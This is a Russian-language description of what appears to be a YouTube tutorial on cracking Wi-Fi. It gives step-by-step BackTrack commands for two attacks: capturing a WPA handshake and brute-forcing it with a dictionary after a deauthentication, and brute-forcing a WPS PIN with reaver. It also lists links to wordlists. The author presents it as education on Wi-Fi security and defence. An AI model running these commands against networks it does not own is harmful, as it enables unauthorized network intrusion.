Обсудить компьютерную безопасность можно на моем новом форуме в этой ветке - \r
\r
Если вам понравилось это видео, то не пропустите мой новый ролик про ARP-спуфинг - \r
\r
Внимание! BackTrack больше неактуален, скачивайте Kali Linux (там все практически также как и в BackTrack) - \r
\r
Список поддерживаемых беспроводных адаптеров для BackTrack 5 - \r
\r
Про WPA - \r
\r
Словари для брутфорса - \r
Здесь можно скачать BackTrack (НЕАКТУАЛЬНО, на данный момент его поддержка прекращена и сейчас актуален Kali Linux) - \r
\r
Kali Linux - \r
\r
Список команд для BackTrack которые я использовал в видео с описанием:\r
-----------------------------------------------------------------------------------------------------------------\r
1. Взлом путем перехвата HandShake:\r
---узнаем имя нашей карты wifi---\r
ifconfig wlan\r
---переводим ее в режим мониторинга---\r
airmon-ng start wlan0\r
---сканируем доступные wifi сети (что-бы остановить нажмите ctrl+c)---\r
airodump-ng mon0\r
---запускаем сканирование интересующей сети и сохраняем пакеты (ждем рукопожатия)---\r
airodump-ng mon0 --channel x --bssid xx:xx:xx:xx:xx:xx -w /root/Desktop/WPA\r
---отключаем клиента от интересующей нас сети что-бы получить handshake---\r
aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0\r
---запускаем перебор по словарю---\r
aircrack-ng -w /root/Desktop/Dictionary.dic -b xx:xx:xx:xx:xx:xx /root/Desktop/WPA*.cap\r
-----------------------------------------------------------------------------------------------------------------\r
2. Взлом путем подбора PIN от WPS\r
---узнаем имя нашей карты wifi---\r
ifconfig wlan\r
---переводим ее в режим мониторинга---\r
airmon-ng start wlan0\r
---сканируем точки доступа с включенным режимом WPS (если пункт WPS-Loced в значении no, точка подвержена взлому)---\r
wash -i mon0\r
---запускаем подбор PIN (т.к. цифр 8 то комбинаций 100 000 000) у точки mac-адрес которой узнали из предыдущей команды---\r
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv\r
\r
В этом ролике я постарался описать как вообще работает Wi-Fi, как происходит авторизация и рассказал о технологии WPA2-PSK, WPS, AES и TKIP, а также о методах шифрования трафика в wi-fi и стандарте ieee.802.11i и о том что такое 4-х стороннее рукопожатие (4-way handshake). А еще посмотрев этот ролик вы узнаете как можно взломать wi-fi сеть, почему такое происходит и как попытаться от этого защититься. Все что я делал в ролике было выполнено на моем личном оборудовании и ничьих сетей я не взламывал.